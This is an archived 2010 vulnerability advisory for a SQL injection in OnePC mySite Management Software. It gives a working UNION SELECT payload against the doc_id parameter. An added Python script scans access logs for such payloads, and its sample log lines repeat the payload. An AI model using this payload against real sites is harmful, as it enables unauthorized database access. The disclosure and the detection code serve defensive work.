OnePC mySite Management Software SQL Injection

2010-04-13T00:00:00
ID PACKETSTORM:88287
Type packetstorm
Reporter Valentin Hoebel
Modified 2010-04-13T00:00:00

Description

                                        
`# Exploit Title: OnePC mySite Management Software SQL Injection Vulnerability  
# Date: 10.04.2010  
# Author: Valentin  
# Category: webapps/0day  
# Version:   
# Tested on:   
# CVE :   
# Code :   
  
  
  
:: General information  
:: OnePC mySite Management Software SQL Injection Vulnerability  
:: by Valentin Hoebel  
:: valentin@xenuser.org  
  
:: Product information  
:: Name = OnePC mySite Management Software  
:: Vendor = OnePC  
:: Vendor Website = http://www.onepc.net/  
:: Affected versions = Beta 5  
  
  
:: SQL Injection Vulnerability  
  
Vulnerable URL  
http://www.some-cool-domain.tld/index.php?view=docs&doc_id=XX  
  
Exploit the vulnerability  
http://www.some-cool-domain.tld/index.php?view=docs&doc_id=XX+AND+1=2+UNION+SELECT+concat(user()),concat(user()),concat(user()),concat(user()),5--  
  
  
:: Additional information  
:: Vendor notified = 10.04.2010  
:: Advisory published = 11.04.2010  
The software no longer seems to be developed, and not many websites use it today.  
`
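
A log-review check for the doc_id parameter described in the advisory, as an added example that is not part of the original advisory or of the vendor's code. It assumes doc_id is meant to be a plain integer and that the web server writes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client addresses are documentation placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Apr/2010:10:01:02 +0000] "GET /index.php?view=docs&doc_id=12 HTTP/1.1" 200 5120
198.51.100.9 - - [13/Apr/2010:10:01:09 +0000] "GET /index.php?view=docs&doc_id=12+AND+1=2+UNION+SELECT+concat(user()),5-- HTTP/1.1" 200 4312
198.51.100.9 - - [13/Apr/2010:10:01:15 +0000] "GET /index.php?view=docs&doc_id=12%27 HTTP/1.1" 500 310
198.51.100.3 - - [13/Apr/2010:10:02:00 +0000] "GET /index.php?view=news&id=4 HTTP/1.1" 200 2048
"""

# Client address, request target and status code from one access-log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# UNION ... SELECT inside an already URL-decoded parameter value.
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)

def classify_doc_id(value):
    """Return None for a plain integer id, otherwise a label for the anomaly."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    if UNION_RE.search(value):
        return "union-select"
    return "non-numeric"

def scan(log_text):
    """Return findings for index.php?view=docs requests with a suspicious doc_id."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        # parse_qs URL-decodes values, so "+" and %27 are seen as space and quote.
        params = parse_qs(url.query, keep_blank_values=True)
        if not url.path.endswith("index.php") or params.get("view") != ["docs"]:
            continue
        for value in params.get("doc_id", []):
            verdict = classify_doc_id(value)
            if verdict:
                findings.append((client, int(status), verdict, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "union-select" finding answered with status 200 deserves a closer look than a "non-numeric" one answered with an error, since the query may have executed.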